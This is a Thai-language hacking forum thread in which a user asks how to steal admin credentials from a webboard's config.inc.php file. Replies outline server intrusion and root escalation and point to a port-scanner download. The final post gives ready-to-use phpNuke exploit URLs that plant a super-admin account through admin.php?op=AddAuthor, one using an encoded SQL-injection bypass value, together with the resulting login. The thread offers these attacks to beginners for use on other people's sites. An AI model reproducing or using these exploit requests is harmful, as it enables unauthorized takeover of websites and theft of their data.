คือถามหน่อยนะครับ คือระบบของเว็บบอร์ดนะเก็บขอมูลของ admin ไว้ที่ file config.inc.php ผมต้องการจะเอามาจะทำได้ไหมครับ
Printable View
คือถามหน่อยนะครับ คือระบบของเว็บบอร์ดนะเก็บขอมูลของ admin ไว้ที่ file config.inc.php ผมต้องการจะเอามาจะทำได้ไหมครับ
มีความเป็นได้ครับ แต่ก็ต้องอาศัยเทคนิคอื่นๆทางอ้อมครับ เพราะการที่จะเข้าไปอ่านไฟล์นั้นได้ก็จำเป็นจะต้อง ได้สิทธิการเข้า server นั้นๆก่อน โดยจะใช้ exploit ใดในการเจาะนั้นก็ต้องว่ากันต่อไป ขั้นตอนต่อมาก็ทำการหาช่องโหว่ภายในระบบเพื่อที่จะได้สิทธิเป็น root เพื่อสิทธิสูงสุดในอ่านข้อมูลได้ครับ จริงๆแล้วอาจจะมีวิธีอื่นที่ง่ายกว่านี้ครับ
ขึ้นอยู่กับช่องโหว่ของระบบเว็บ ยกตัวอย่างเช่น ช่องโหว่บน Phpnuke ที่มีออกมาเห็นกันนับไม่ถ้วน
ดูๆๆ มานยากมากๆๆ เลยนะเนี่ย ลำบากจริงๆๆ เลยอะ
พี่ช่วยสอนหน่อยดิครับว่ามาต้องใช้โปรแกรมอะไร บ้างในการ hack นะครับ ช่วยหน่อยนะ
ก่อนอื่นก็ต้องหาพวก port scan ครับที่ผมใช้แล้คิดว่าสะดวกสุดก็ได้ http://www.citecclub.org/~asylum/download/Retina.zip
หลังจากที่ได้ผลลัพธ์การแจ้งช่องโหว่แล้วก็ทำการหา exploit script จากเว็บ
แล้วโปรแกรม port scanอันนี้มันใช้ยังไงครับ ลงแล้วยังใช้ไม่เป็นเลยอะ
Use that tool to searching for the active service on target host. Then it will report u all possibility of a vunerabillity on that host. Finally what u need to do is searching for an exploit script to try it.Quote:
แล้วโปรแกรม port scanอันนี้มันใช้ยังไงครับ ลงแล้วยังใช้ไม่เป็นเลยอะ
ลองไปหาโหลดมาแล้วครับผม จะลองใ้ช้งานดู
โหลดมาแล้วครับ ดีมากๆ ลองใช้งานดูแล้วยากพอควรนะครับ มือใหม่อ่ะน่ะ แต่จะพยายามหาประโยชน์จาก board นี้
ให้ได้ ใครลองแล้วแนะนำด้วยนะครับ[font=Tahoma]
พี่ช่วยสอนหน่อยดิครับว่ามาต้องใช้โปรแกรมอะไร บ้างในการ hack นะครับ
แล้วมันต้องหาช่องโหว่ยังไงบ้างอ่ะคับ ช่วยชี้แนะทีครับ ขอบคุนคับ
ผมไม่รู้ว่าคุณได้อ่านกฎหรือยัง เตือนก่อนนะครับ ช่วยอ่านกฎก่อนโพสด้วยนะครับQuote:
พี่ช่วยสอนหน่อยดิครับว่ามาต้องใช้โปรแกรมอะไร บ้างในการ hack นะครับ
แล้วมันต้องหาช่องโหว่ยังไงบ้างอ่ะคับ ช่วยชี้แนะทีครับ ขอบคุนคับ
[/b]
เรื่องที่เราจะหา port นี่ เราต้องใช้โปรแกรมดัก packet ไหมค้าบ หรือว่ายังไง แล้ว เราต้องทำไงถึงจะเข้า php ง่ายที่สุด ช่วยอธิบายทีค้าบ
ลองดูนะครับ copy เข้ามาอีกที
อันดับแรกเลยหาเว็บ phpNuke
http://ชื่อเว็บ/admin.php
หาหน้า admin.php
ใส่คำสั่งต่อท้าย
CODEhttp://ชื่อเว็บ/admin.php?op=AddAuthor&add_aid=oung&add_name=God&add_pwd=8576&add_email=g@g.com&add_radminsuper=1
หรือไม่ได้ก็ลองนี้อีกคำสั่ง
CODEhttp://ชื่อเว็บ/admin.php?op=AddAuthor&add_aid=gitem&add_name=God&add_pwd=hacked&add_email=g@g.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
ถ้าได้ผลมันจะวิ่งกลับมาที่หน้า admin.php เหมือนเดิม
เมื่อได้ผลเราก็แค่ login
user oung
pass 8576